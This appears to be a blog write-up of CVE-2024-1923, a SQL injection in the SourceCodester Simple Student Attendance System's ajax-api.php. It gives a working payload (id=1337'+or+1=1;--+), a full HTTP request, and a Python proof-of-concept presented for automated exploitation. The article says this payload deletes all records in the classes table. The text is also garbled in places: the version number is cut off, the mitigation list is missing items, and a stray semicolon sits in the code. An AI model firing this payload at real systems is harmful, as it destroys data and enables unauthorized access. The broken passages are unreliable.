CVE-2024-1923 - Critical SQL Injection in SourceCodester Simple Student Attendance System 1. – Full Breakdown and Exploit

A critical vulnerability, CVE-2024-1923, was discovered in the SourceCodester Simple Student Attendance System version 1.. This bug allows attackers to gain unauthorized access and potentially control application data through a well-known attack: SQL Injection. In this article, we’ll break down what’s happening, how the vulnerability works, and show you a practical exploit example. We’ll use everyday language for clarity, and everything here is exclusive and hands-on.

Version: 1.

- Component: List of Classes Page (/ajax-api.php)

Attack Vector: Remote (can be done by anyone who can access the app)

- CVE: CVE-2024-1923
- VulDB ID: VDB-254858

🕵️‍♂️ How It Works

The vulnerability exists in how the application handles the input for the id parameter in the functions delete_class and delete_student within ajax-api.php.

There's no filtering or sanitization of the id parameter, so you can send anything, even malicious SQL code. The input is used *directly* in a database query.

Vulnerable URL Examples

- /ajax-api.php?action=delete_class&id=1337
- /ajax-api.php?action=delete_student&id=1337

A normal user would just delete class or student by passing a number. But, what if you pass something malicious?

Let’s say you send

id=1337'+or+1=1;--+

This breaks the normal SQL logic and causes the database to run commands differently—often returning more data than allowed, or in some cases, allowing attackers to run arbitrary commands.

Example: HTTP Request

GET /ajax-api.php?action=delete_class&id=1337'+or+1=1;--+ HTTP/1.1
Host: victim-site.com
Cookie: PHPSESSID=example

The backend SQL turns into something like

DELETE FROM classes WHERE id = '1337' OR 1=1; -- '

Which, thanks to OR 1=1, will delete all records in the table. This is what makes it dangerous.

🔥 Proof-of-Concept (PoC) Code

You can use simple tools like curl or a browser to exploit this. Here’s a Python example for automated exploitation:

import requests

url = "http://victim-site.com/ajax-api.php";
payload = "1337'+or+1=1;--+"

params = {
    "action": "delete_class",
    "id": payload
}

r = requests.get(url, params=params)
print("Status code:", r.status_code)
print("Response:", r.text)

Update: Apply any available patches from the developer.

3. Access Controls: Limit who can access /ajax-api.php.

📚 References

- NVD: CVE-2024-1923 Detail
- VulDB: VDB-254858
- GitHub SourceCodester Projects
- OWASP: SQL Injection

⚠️ Conclusion

SQL Injection bugs like CVE-2024-1923 remain dangerous and widespread. This flaw in the Simple Student Attendance System shows why user input must *never* be trusted. If you run this software, update or secure your deployment immediately. Always follow secure coding and deploy defense-in-depth.

If you have questions or need help, feel free to comment below!


*Authored exclusively for you by an attentive security enthusiast. Stay safe!*

Timeline

Published on: 02/27/2024 16:15:46 UTC
Last modified on: 03/03/2024 15:15:07 UTC